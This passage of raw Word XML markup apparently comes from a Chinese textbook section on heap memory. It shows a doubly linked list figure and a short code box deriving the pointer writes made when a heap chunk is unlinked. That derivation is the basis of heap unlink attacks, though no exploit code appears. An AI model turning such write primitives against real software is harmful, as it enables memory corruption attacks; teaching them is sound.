                          <a:ext cx="506098" cy="421199"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0290E4C1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:ind w:firstLineChars="83" w:firstLine="174"/>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3ABAFA" id="矩形 110" o:spid="_x0000_s1104" style="width:39.85pt;height:3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8KlTwIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X2wHabcEdYogRYcB&#10;RVu0HXpWZKkxJosapcTOfv0o2XGKrthh2EUmRT5+6dEXl11j2F6hr8GWvJjknCkroartS8m/P11/&#10;+sKZD8JWwoBVJT8ozy+XHz9ctG6hprAFUylkFMT6RetKvg3BLbLMy61qhJ+AU5aMGrARgVR8ySoU&#10;LUVvTDbN8/OsBawcglTe0+1Vb+TLFF9rJcOd1l4FZkpOtYV0Yjo38cyWF2LxgsJtazmUIf6hikbU&#10;lpKOoa5EEGyH9R+hmloieNBhIqHJQOtaqtQDdVPkb7p53AqnUi80HO/GMfn/F1be7h/dPdIYWucX&#10;nsTYRaexiV+qj3VpWIdxWKoLTNLlWX6ez+l1JZlm06KYz+MwsxPYoQ9fFTQsCiVHeos0IrG/8aF3&#10;PboQ7pQ+SeFgVKzA2AelWV1RwmlCJ2aotUG2F/Sm1Y9iSJs8I0TXxoyg4j2QCUfQ4BthKrFlBObv&#10;AU/ZRu+UEWwYgU1tAf8O1r3/seu+19h26DYdNUvDTQXGqw1Uh3tkCD11vZPXNc3zRvhwL5C4Sqym&#10;/Qt3dGgDbclhkDjbAv567z76E4XIyllL3C+5/7kTqDgz3yyRa17MZnFZkjI7+zwlBV9bNq8tdtes&#10;gZ6ioE13MonRP5ijqBGaZ1rTVcxKJmEl5S65DHhU1qHfSVp0qVar5EYL4kS4sY9OxuBx0JEvT92z&#10;QDeQKhAbb+G4J2Lxhlu9b0RaWO0C6DoR7zTX4QlouRJ1hx9B3N7XevI6/a6WvwEAAP//AwBQSwME&#10;FAAGAAgAAAAhAOpKhzPaAAAAAwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyo&#10;A0gJTbOpKgQnEFULB45uvE0i7HVku0n69xgucFlpNKOZt9V6tkaM5EPvGOF2kYEgbpzuuUX4eH++&#10;eQARomKtjGNCOFOAdX15UalSu4l3NO5jK1IJh1IhdDEOpZSh6ciqsHADcfKOzlsVk/St1F5Nqdwa&#10;eZdlubSq57TQqYEeO2q+9ieL4Lb92Wz88m18peLzZRuzac6fEK+v5s0KRKQ5/oXhBz+hQ52YDu7E&#10;OgiDkB6Jvzd5xbIAcUDI83uQdSX/s9ffAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADVH&#10;wqVPAgAA9gQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AOpKhzPaAAAAAwEAAA8AAAAAAAAAAAAAAAAAqQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAACwBQAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0290E4C1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:ind w:firstLineChars="83" w:firstLine="174"/>
                      </w:pPr>
                      <w:r>
                        <w:t>c</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C442D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="607" w:left="1275" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F53F02" wp14:editId="187F1DA6">
                <wp:extent cx="506098" cy="421199"/>
                <wp:effectExtent l="0" t="0" r="27305" b="17145"/>
                <wp:docPr id="111" name="矩形 111"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="506098" cy="421199"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3C6996C2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:ind w:firstLineChars="83" w:firstLine="174"/>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F53F02" id="矩形 111" o:spid="_x0000_s1105" style="width:39.85pt;height:3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uvoUAIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L7aDtFuCOkWQosOA&#10;oi3aDj0rstQYk0WNUmJnXz9KdpyiK3YYdpEpkY8Unx59cdk1hu0V+hpsyYtJzpmyEqravpT8+9P1&#10;py+c+SBsJQxYVfKD8vxy+fHDResWagpbMJVCRkmsX7Su5NsQ3CLLvNyqRvgJOGXJqQEbEWiLL1mF&#10;oqXsjcmmeX6etYCVQ5DKezq96p18mfJrrWS409qrwEzJ6W4hrZjWTVyz5YVYvKBw21oO1xD/cItG&#10;1JaKjqmuRBBsh/UfqZpaInjQYSKhyUDrWqrUA3VT5G+6edwKp1IvRI53I03+/6WVt/tHd49EQ+v8&#10;wpMZu+g0NvFL92NdIuswkqW6wCQdnuXn+ZxeV5JrNi2K+TySmZ3ADn34qqBh0Sg50lskisT+xoc+&#10;9BhCuFP5ZIWDUfEGxj4ozeqKCk4TOilDrQ2yvaA3rX4UQ9kUGSG6NmYEFe+BTDiChtgIU0ktIzB/&#10;D3iqNkanimDDCGxqC/h3sO7jj133vca2Q7fpqFkidxq7ikcbqA73yBB66Xonr2vi80b4cC+QtEqq&#10;pvkLd7RoA23JYbA42wL+eu88xpOEyMtZS9ovuf+5E6g4M98siWtezGZxWNJmdvZ5Sht87dm89thd&#10;swZ6ioIm3clkxvhgjqZGaJ5pTFexKrmElVS75DLgcbMO/UzSoEu1WqUwGhAnwo19dDImj0RHvTx1&#10;zwLdIKpAaryF45yIxRtt9bERaWG1C6DrJLwTr8MT0HAl6Q4/gji9r/cp6vS7Wv4GAAD//wMAUEsD&#10;BBQABgAIAAAAIQDqSocz2gAAAAMBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjc&#10;qANICU2zqSoEJxBVCweObrxNIux1ZLtJ+vcYLnBZaTSjmbfVerZGjORD7xjhdpGBIG6c7rlF+Hh/&#10;vnkAEaJirYxjQjhTgHV9eVGpUruJdzTuYytSCYdSIXQxDqWUoenIqrBwA3Hyjs5bFZP0rdReTanc&#10;GnmXZbm0que00KmBHjtqvvYni+C2/dls/PJtfKXi82Ubs2nOnxCvr+bNCkSkOf6F4Qc/oUOdmA7u&#10;xDoIg5Aeib83ecWyAHFAyPN7kHUl/7PX3wAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADh&#10;AQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4&#10;/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAO&#10;5uvoUAIAAPYEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQDqSocz2gAAAAMBAAAPAAAAAAAAAAAAAAAAAKoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAAsQUAAAAA&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C6996C2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:ind w:firstLineChars="83" w:firstLine="174"/>
                      </w:pPr>
                      <w:r>
                        <w:t>b</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA12EB0" wp14:editId="4588F76B">
                <wp:extent cx="584200" cy="421199"/>
                <wp:effectExtent l="0" t="0" r="25400" b="17145"/>
                <wp:docPr id="112" name="矩形 112"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="584200" cy="421199"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7E39C401" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:ind w:firstLineChars="83" w:firstLine="174"/>
                            </w:pPr>
                            <w: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A12EB0" id="矩形 112" o:spid="_x0000_s1106" style="width:46pt;height:3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O5UAIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r46zdGuDOEWQosOA&#10;og3WDj0rspQYk0WNUmJnXz9KdpygK3YYdpFJkY8UyUfPbtrasL1CX4EteH4x4kxZCWVlNwX//nz3&#10;4YozH4QthQGrCn5Qnt/M37+bNW6qxrAFUypkFMT6aeMKvg3BTbPMy62qhb8ApywZNWAtAqm4yUoU&#10;DUWvTTYejT5lDWDpEKTynm5vOyOfp/haKxketfYqMFNweltIJ6ZzHc9sPhPTDQq3rWT/DPEPr6hF&#10;ZSnpEOpWBMF2WP0Rqq4kggcdLiTUGWhdSZVqoGry0atqnrbCqVQLNce7oU3+/4WVD/snt0JqQ+P8&#10;1JMYq2g11vFL72NtatZhaJZqA5N0eXk1oQFwJsk0Gef59XVsZnYCO/Thi4KaRaHgSLNILRL7ex86&#10;16ML4U7pkxQORsUXGPtNaVaVlHCc0IkZammQ7QXNtPyR92mTZ4ToypgBlL8FMuEI6n0jTCW2DMDR&#10;W8BTtsE7ZQQbBmBdWcC/g3Xnf6y6qzWWHdp1S8VScz/GquLVGsrDChlCR13v5F1F/bwXPqwEEldp&#10;BLR/4ZEObaApOPQSZ1vAX2/dR3+iEFk5a4j7Bfc/dwIVZ+arJXJd55NJXJakTC4/j0nBc8v63GJ3&#10;9RJoFDltupNJjP7BHEWNUL/Qmi5iVjIJKyl3wWXAo7IM3U7Soku1WCQ3WhAnwr19cjIGj42OfHlu&#10;XwS6nlSB2PgAxz0R01fc6nwj0sJiF0BXiXinvvYjoOVK1O1/BHF7z/XkdfpdzX8DAAD//wMAUEsD&#10;BBQABgAIAAAAIQCY9p7R2QAAAAMBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSP0Haytx&#10;ow5FCjTEqaqqnEBULRw4uvGSRNjryHaT9O9ZuMBlpNGsZt6W68lZMWCInScFt4sMBFLtTUeNgve3&#10;p5sHEDFpMtp6QgUXjLCuZlelLowf6YDDMTWCSygWWkGbUl9IGesWnY4L3yNx9umD04ltaKQJeuRy&#10;Z+Uyy3LpdEe80Ooety3WX8ezU+D33cVuwup1eMH7j+d9ysYp3yl1PZ82jyASTunvGH7wGR0qZjr5&#10;M5korAJ+JP0qZ6slu5OCPL8DWZXyP3v1DQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEGM&#10;o7lQAgAA9gQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AJj2ntHZAAAAAwEAAA8AAAAAAAAAAAAAAAAAqgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAACwBQAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E39C401" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:ind w:firstLineChars="83" w:firstLine="174"/>
                      </w:pPr>
                      <w:r>
                        <w:t>p2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3288A9C6" wp14:editId="3FE5EBF8">
                <wp:extent cx="506098" cy="421199"/>
                <wp:effectExtent l="0" t="0" r="27305" b="17145"/>
                <wp:docPr id="113" name="矩形 113"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="506098" cy="421199"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="61990775" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:ind w:firstLineChars="83" w:firstLine="174"/>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88A9C6" id="矩形 113" o:spid="_x0000_s1107" style="width:39.85pt;height:3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hyUAIAAPYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L7aDtFuCOkWQosOA&#10;oi3aDj0rstQYk0WNUmJnXz9KdpyiK3YYdpEpkY8Unx59cdk1hu0V+hpsyYtJzpmyEqravpT8+9P1&#10;py+c+SBsJQxYVfKD8vxy+fHDResWagpbMJVCRkmsX7Su5NsQ3CLLvNyqRvgJOGXJqQEbEWiLL1mF&#10;oqXsjcmmeX6etYCVQ5DKezq96p18mfJrrWS409qrwEzJ6W4hrZjWTVyz5YVYvKBw21oO1xD/cItG&#10;1JaKjqmuRBBsh/UfqZpaInjQYSKhyUDrWqrUA3VT5G+6edwKp1IvRI53I03+/6WVt/tHd49EQ+v8&#10;wpMZu+g0NvFL92NdIuswkqW6wCQdnuXn+ZxeV5JrNi2K+TySmZ3ADn34qqBh0Sg50lskisT+xoc+&#10;9BhCuFP5ZIWDUfEGxj4ozeqKCk4TOilDrQ2yvaA3rX4UQ9kUGSG6NmYEFe+BTDiChtgIU0ktIzB/&#10;D3iqNkanimDDCGxqC/h3sO7jj133vca2Q7fpqFkidxa7ikcbqA73yBB66Xonr2vi80b4cC+QtEqq&#10;pvkLd7RoA23JYbA42wL+eu88xpOEyMtZS9ovuf+5E6g4M98siWtezGZxWNJmdvZ5Sht87dm89thd&#10;swZ6ioIm3clkxvhgjqZGaJ5pTFexKrmElVS75DLgcbMO/UzSoEu1WqUwGhAnwo19dDImj0RHvTx1&#10;zwLdIKpAaryF45yIxRtt9bERaWG1C6DrJLwTr8MT0HAl6Q4/gji9r/cp6vS7Wv4GAAD//wMAUEsD&#10;BBQABgAIAAAAIQDqSocz2gAAAAMBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjc&#10;qANICU2zqSoEJxBVCweObrxNIux1ZLtJ+vcYLnBZaTSjmbfVerZGjORD7xjhdpGBIG6c7rlF+Hh/&#10;vnkAEaJirYxjQjhTgHV9eVGpUruJdzTuYytSCYdSIXQxDqWUoenIqrBwA3Hyjs5bFZP0rdReTanc&#10;GnmXZbm0que00KmBHjtqvvYni+C2/dls/PJtfKXi82Ubs2nOnxCvr+bNCkSkOf6F4Qc/oUOdmA7u&#10;xDoIg5Aeib83ecWyAHFAyPN7kHUl/7PX3wAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADh&#10;AQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4&#10;/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB4&#10;pLhyUAIAAPYEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQDqSocz2gAAAAMBAAAPAAAAAAAAAAAAAAAAAKoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAAsQUAAAAA&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="61990775" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:ind w:firstLineChars="83" w:firstLine="174"/>
                      </w:pPr>
                      <w:r>
                        <w:t>d</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0321D"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hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">.19 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>双向链表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AF4C1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程序向操作系统请求堆内存分配，假设操作系统分配p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在的堆块，接下来需要将p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在的堆块从链表中取出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A07DC9C"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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="729A572B" wp14:editId="260EF0CD">
                <wp:extent cx="3672840" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:docPr id="1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04620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4BDBBC52" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="002B51C3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.6</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47D47E64"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*b=c, *c=a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3E018BAF"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*b=c  →  *(a+1)=c  →  *(*p1+1)=*p2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5C588BBE"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>*</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>c=a  →  *(*p2)=*p1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4BF5E9B0"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>*</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>p2=p1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3412F3D5"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>*</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>(p1+1)=p2</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="729A572B" id="_x0000_s1108" type="#_x0000_t202" style="width:28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lL7EwIAAP8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6+X17NVnMKSYpN5/l8OUttyUTxfNyhD58UdCxOSo7U1SQvjvc+xHRE8bwl3ubB6HqnjUkL&#10;3Fdbg+woyAG79KUKXm0zlvUlv17MFknZQjyfzNHpQA41uiv5Ko/f6JmI46Ot05YgtBnnlImxJz4R&#10;yQgnDNXAdF3yxSIejrwqqB+JGMLoSHpBNGkB/3DWkxtL7n8fBCrOzGdL1K+n84gopMV8cUWIGF5G&#10;qsuIsJKkSh44G6fbkCyfeLhb6s5OJ24vmZxyJpclnKcXEW18uU67Xt7t5gkAAP//AwBQSwMEFAAG&#10;AAgAAAAhAO7/UkfbAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj7FOw0AQRHsk/uG0SHTkbIuE&#10;yPgcISQalIIkFJQbe/EZ+/aM75yYv2ehgWak1axm3hSb2fXqRGNoPRtIFwko4srXLTcGXg9PN2tQ&#10;ISLX2HsmA18UYFNeXhSY1/7MOzrtY6MkhEOOBmyMQ651qCw5DAs/EIv37keHUc6x0fWIZwl3vc6S&#10;ZKUdtiwNFgd6tFR1+8lJyTZU085/fqTbTr/ZboXLF/tszPXV/HAPKtIc/57hB1/QoRSmo5+4Dqo3&#10;IEPir4q3vFvfgjoayLI0A10W+j99+Q0AAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC6elL7&#10;EwIAAP8DAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG